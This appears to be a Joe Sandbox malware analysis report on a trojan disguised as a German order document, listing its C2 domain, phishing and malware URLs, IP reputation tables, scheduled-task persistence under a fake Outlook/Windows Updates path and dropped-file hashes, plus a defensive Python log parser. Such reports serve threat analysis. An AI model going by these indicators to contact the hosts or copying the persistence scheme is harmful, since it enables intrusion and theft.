https://api.ipify.org/ | Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.datacontract.org/2004/07/d | outlooks.exe, 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000033E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.datacontract.org/2004/07/ | outlooks.exe, 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ipwho.isd | outlooks.exe, 00000016.00000002.3874269347.00000000035F6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ipwho.is | outlooks.exe, 00000016.00000002.3874269347.00000000035E4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://localhost/arkanoid_server/requests.php | outlooks.exe, 0000000F.00000002.1685100686.00000000033B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354sCannot | Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Bestellung - 021224 - 901003637.exe, 00000000.00000002.1448519828.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1499776253.0000000003191000.00000004.00000800.00020000.00000000.sdmp, eNuXmIwkixzW.exe, 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 0000000F.00000002.1685100686.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000033DB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.dr | false | | high
http://ipwho.is | outlooks.exe, 00000016.00000002.3874269347.00000000035F6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft. | outlooks.exe, 00000016.00000002.3872064876.000000000179B000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
193.34.212.17 | hoffmann3.ydns.eu | Poland | 201814 | PL-SKYTECH-ASPL | true
103.126.138.87 | ipwho.is | United States | 40676 | AS40676US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567415
Start date and time: 2024-12-03 14:52:39 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Bestellung - 021224 - 901003637.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@49/37@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 184
• Number of non-executed functions: 19
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 199.232.214.172
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: Bestellung - 021224 - 901003637.exe
Time | Type | Description
08:53:34 | API Interceptor | 1x Sleep call for process: Bestellung - 021224 - 901003637.exe modified
08:53:37 | API Interceptor | 138x Sleep call for process: powershell.exe modified
08:53:42 | API Interceptor | 9970715x Sleep call for process: outlooks.exe modified
08:53:52 | API Interceptor | 1x Sleep call for process: eNuXmIwkixzW.exe modified
14:53:39 | Task Scheduler | Run new task: eNuXmIwkixzW path: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
14:53:41 | Task Scheduler | Run new task: Outlooks path: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
Match | Associated Sample Name / URL | Detection | Threat Name
193.34.212.17 | Zam.exe | malicious | Discord Token Stealer, PureLog Stealer
 | KRcLFIz5PCQunB7.exe | malicious | Quasar
103.126.138.87 | https://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20== | malicious | Unknown
 | Employee_Important_Message.pdf | malicious | Unknown
 | Employee_Secure_Doc.pdf | malicious | Unknown
 | https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ== | malicious | Unknown
 | Employee_Important_Message.pdf | malicious | Unknown
 | https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29t | malicious | Unknown
 | http://www.urbanerecycling.com | malicious | HTMLPhisher, TechSupportScam
 | 0Nj1sxmCtr.exe | malicious | Binder HackTool, Quasar
 | https://doam29-kk5ug.ondigitalocean.app/ | malicious | TechSupportScam
 | https://tronblma3sw.z13.web.core.windows.net/?click_id=2isqs9om0m3rjybj2&tid=903&subid=novatechwheels.com&ref=novatechwheels.com&922%5D | malicious | TechSupportScam
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ipwho.is | http://www.urbanerecycling.com | malicious | HTMLPhisher, TechSupportScam | 103.126.138.87
 | 0Nj1sxmCtr.exe | malicious | Binder HackTool, Quasar | 103.126.138.87
 | https://doam29-kk5ug.ondigitalocean.app/ | malicious | TechSupportScam | 103.126.138.87
 | https://tronblma3sw.z13.web.core.windows.net/?click_id=2isqs9om0m3rjybj2&tid=903&subid=novatechwheels.com&ref=novatechwheels.com&922%5D | malicious | TechSupportScam | 103.126.138.87
 | KRcLFIz5PCQunB7.exe | malicious | Quasar | 103.126.138.87
 | ________.exe | malicious | Quasar | 195.201.57.90
 | Zam#U00f3wienie 89118 _ Metal-Constructions.pdf.com.exe | malicious | Quasar | 195.201.57.90
 | Order88983273293729387293828PDF.exe | malicious | Quasar | 195.201.57.90
 | 1Eo0gOdDsV.exe | malicious | Quasar | 195.201.57.90
 | https://2storageaccounterm67.z13.web.core.windows.net/Win08Ay0Er08d8d77/index.html# | malicious | TechSupportScam | 195.201.57.90
bg.microsoft.map.fastly.net | JEM PLATBY.exe | malicious | Unknown | 199.232.214.172
 | KvG1NAXkgp9PxQb.exe | malicious | FormBook | 199.232.214.172
 | Swiftcopy.xla.xlsx | malicious | Unknown | 199.232.210.172
 | Pagamento deposito e fattura proforma firmata.xls | malicious | Unknown | 199.232.214.172
 | 1099833039444.pdf.js | malicious | Remcos | 199.232.214.172
 | phish_alert_sp2_2.0.0.0 (8).eml | malicious | Unknown | 199.232.210.172
 | 001.xls | malicious | Get2Downloader | 199.232.214.172
 | 442.docx.exe | malicious | RMSRemoteAdmin | 199.232.214.172
 | 27112024_0154_new.bat | malicious | Unknown | 199.232.210.172
 | I_ katya_gianotti@cuzziol_it password scadr#U00e0 oggi!.msg | malicious | Unknown | 199.232.214.172
hoffmann3.ydns.eu | Auftragsbest#U00e4tigung 20241107_pdf.com.exe | malicious | Quasar | 125.0.0.1
 | Bestellung - 20240001833.com.exe | malicious | Quasar | 125.0.0.1
ASNs

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
PL-SKYTECH-ASPL | Zam.exe | Get hash | malicious | Discord Token Stealer, PureLog Stealer | Browse | 193.34.212.17
(as above) | KRcLFIz5PCQunB7.exe | Get hash | malicious | Quasar | Browse | 193.34.212.17
(as above) | file.exe | Get hash | malicious | WhiteSnake Stealer | Browse | 91.223.3.164
(as above) | Payload 94.75 (3).225.exe | Get hash | malicious | Unknown | Browse | 95.214.53.96
(as above) | 4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dll | Get hash | malicious | Unknown | Browse | 193.34.212.14
(as above) | 4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dll | Get hash | malicious | Unknown | Browse | 193.34.212.14
(as above) | SH20240622902.scr.exe | Get hash | malicious | PureLog Stealer, zgRAT | Browse | 193.34.212.15
(as above) | arm7.elf | Get hash | malicious | Unknown | Browse | 95.214.52.167
(as above) | mpslbot.elf | Get hash | malicious | Unknown | Browse | 95.214.52.167
(as above) | mipsbot.elf | Get hash | malicious | Unknown | Browse | 95.214.52.167
AS40676 US | https://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20== | Get hash | malicious | Unknown | Browse | 103.126.138.87
(as above) | Employee_Important_Message.pdf | Get hash | malicious | Unknown | Browse | 103.126.138.87
(as above) | sora.arm.elf | Get hash | malicious | Mirai | Browse | 107.169.202.161
(as above) | powerpc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 23.91.0.144
(as above) | x86_64.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 107.176.168.239
(as above) | la.bot.sparc.elf | Get hash | malicious | Mirai | Browse | 107.177.38.11
(as above) | sh4.elf | Get hash | malicious | Mirai, Moobot | Browse | 104.244.155.34
(as above) | Employee_Secure_Doc.pdf | Get hash | malicious | Unknown | Browse | 103.126.138.87
(as above) | https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ== | Get hash | malicious | Unknown | Browse | 103.126.138.87
(as above) | Employee_Important_Message.pdf | Get hash | malicious | Unknown | Browse | 103.126.138.87
JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | Teklif Talebi- İhale 14990_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 103.126.138.87
(as above) | NEW90FL0OtSHAz.bat.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 103.126.138.87
(as above) | 1099833039444.pdf.js | Get hash | malicious | Remcos | Browse | 103.126.138.87
(as above) | https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406 | Get hash | malicious | KnowBe4 | Browse | 103.126.138.87
(as above) | kjsdhf243kj2.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 103.126.138.87
(as above) | kjsdfhsdHndf.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 103.126.138.87
(as above) | hkjsdhf01.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 103.126.138.87
(as above) | kjshdfj_ksdf02.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 103.126.138.87
(as above) | sjadhfkjshd0de.bat | Get hash | malicious | Abobus Obfuscator, Braodo | Browse | 103.126.138.87
No context

Process: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
File Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 71954
Entropy (8bit): 7.996617769952133
Encrypted: true
SSDEEP: 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5: 49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1: 1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256: B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512: BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious: false
Note: "Encrypted: true" reflects the entropy of the compressed cabinet (7.997 bits per byte), not encryption. authroot.stl is Microsoft's signed trusted-root certificate list, which CryptoAPI fetches on its own when it needs to validate a certificate chain, so this drop is a by-product of the process making a TLS connection rather than attacker-supplied content.
Preview: MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
Process: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.244101792565376
Encrypted: false
SSDEEP: 6:kK9NF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:VNsDImsLNkPlE99SNxAhUe/3
MD5: 46273F90B0C41E0F605DF4CAF0B6C3D1
SHA1: D2B606CFA8FAE774B3AC7915F273A3B7DD3FCB72
SHA-256: BDA713D577F2E1D88266B601FDABBAB48555CD43E078E8E1B4A3FEBA56F38D08
SHA-512: B84572B4FA556F211267A23453BB75228532EAE46002BEA1BD29AD3B4459E7A53E379E57043BFE6E787F3FA4F95E549CE44FF31A69C268A4FA0CF6BF15E01077
Malicious: false
Preview: p...... .........5b..E..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
Note: the dotted text in the preview is a UTF-16LE string: the download URL http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab followed by the HTTP ETag "a7282eb40b1da1:0". This is CryptoAPI's cache metadata for the authroot.stl cabinet listed in the previous entry, and like it is benign.
Process: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Note: this is a CLR assembly usage log, written by the .NET runtime for the process and listing the framework assemblies it bound (System.Windows.Forms, System.Drawing, System.Configuration, System.Xml and so on). Its "Malicious: true" rating comes from the writing process being the sample, not from the content, which is runtime-generated; the same file, with identical hashes, is dropped again by the two later copies of the sample.
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
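The three identical 1216-byte files above (dropped by the sample, by eNuXmIwkixzW.exe and by outlooks.exe) are CLR assembly usage logs, the per-process record the .NET runtime writes of which framework assemblies a managed executable bound; on a live host these logs are normally found under the user's local AppData in the CLR UsageLogs folder, a location this report does not state. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Security tooling. It parses the format as it appears in the preview and returns a triage summary. The sample input is constructed from the preview text (the "." placeholders restored to CRLF) and is cut off exactly where the preview is, so the parser has to handle a record that ends inside a quoted field. The reading of the leading integer as a record kind (1 = loader flags, 2 = assembly bound without a native image, 3 = assembly bound with a native image path) is inferred from the visible lines and is an assumption.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed input: the visible part of the report's preview of the 1216-byte
# file, with the "." placeholders it prints for non-printable bytes restored to
# CRLF. It ends where the preview is cut, inside a quoted path, so the last
# record is deliberately truncated.
SAMPLE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\920e3d1d70447c3c10e69e6df0766568\\System.ni.dll",0\r\n'
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\8b2c1203fd20aea8260bfbc518004720\\System.Core.ni.dll",0\r\n'
    '3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\2192b0d5aa4aa14486ae08118d3b9fcc\\System.Configuration.ni.dll",0\r\n'
    '3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\2062ed810929ec0e33254c02'
)

# Fully qualified .NET assembly name as it appears in the log's quoted fields.
ASSEMBLY_RE = re.compile(
    r"^(?P<name>[^,]+), Version=(?P<version>[^,]+), Culture=[^,]+, "
    r"PublicKeyToken=(?P<token>[0-9a-fA-F]+|null)$"
)


@dataclass
class Record:
    kind: int             # leading integer; 1, 2 or 3 in the sample (meaning assumed, see lead-in)
    fields: list[str]     # quoted string fields, in order
    trailer: int | None   # trailing integer; None when the line is cut off
    truncated: bool       # True if the line ended inside a quoted field


@dataclass
class Assembly:
    name: str
    version: str
    public_key_token: str
    native_image: str | None   # precompiled (.ni.dll) image path when the record carries one
    complete: bool             # False when the record was truncated


def parse_line(line: str) -> Record:
    """Tokenise one line of the form  int,"str"[,"str"]*[,int]  by hand, so an
    unterminated quoted field is reported rather than silently accepted."""
    tokens: list[tuple[bool, str]] = []   # (quoted?, text)
    truncated = False
    pos = 0
    while pos < len(line):
        ch = line[pos]
        if ch == ",":
            pos += 1
        elif ch == '"':
            end = line.find('"', pos + 1)
            if end == -1:                       # end of data inside a quoted field
                tokens.append((True, line[pos + 1:]))
                truncated = True
                break
            tokens.append((True, line[pos + 1:end]))
            pos = end + 1
        else:                                   # unquoted integer token
            end = line.find(",", pos)
            end = len(line) if end == -1 else end
            tokens.append((False, line[pos:end]))
            pos = end
    if not tokens or tokens[0][0]:
        raise ValueError(f"malformed usage-log line: {line!r}")
    kind = int(tokens[0][1])
    trailer, body = None, tokens[1:]
    if len(tokens) > 1 and not tokens[-1][0]:
        trailer, body = int(tokens[-1][1]), tokens[1:-1]
    return Record(kind, [text for _, text in body], trailer, truncated)


def parse_usage_log(text: str) -> list[Record]:
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def loaded_assemblies(records: list[Record]) -> list[Assembly]:
    """Keep records whose first field is an assembly name; the kind-1 lines
    ("fusion"/"GAC", "WinRT"/"NotApp") are loader flags and are skipped."""
    result = []
    for rec in records:
        match = ASSEMBLY_RE.match(rec.fields[0]) if rec.fields else None
        if match is None:
            continue
        native = next((f for f in rec.fields[1:] if f.lower().endswith(".ni.dll")), None)
        result.append(Assembly(match["name"], match["version"], match["token"],
                               native, complete=not rec.truncated))
    return result


def summarize(text: str) -> dict:
    """Triage view: what the process bound and whether the log was read whole."""
    records = parse_usage_log(text)
    assemblies = loaded_assemblies(records)
    return {
        "records": len(records),
        "truncated_records": sum(r.truncated for r in records),
        "assemblies": [a.name for a in assemblies],
        "ngen_images": [a.native_image for a in assemblies if a.native_image],
        # WinForms plus Drawing is what a GUI-capable .NET client such as Quasar binds
        "gui_framework": any(a.name in ("System.Windows.Forms", "System.Drawing")
                             for a in assemblies),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The hand-written tokeniser exists because the csv module would hand back the truncated final path as if it were complete; on a real host the log is whole and any truncation then means the file was tampered with or the process was killed mid-write, which is worth surfacing rather than hiding. The assembly list is the useful part for triage: a "document" that binds System.Windows.Forms and System.Drawing is a GUI-capable .NET program, which is consistent with the Quasar verdict above.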
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 2232
Entropy (8bit): 5.380632238223751
Encrypted: false
SSDEEP: 48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:tLHyIFKL3IZ2KRH9Oug8s
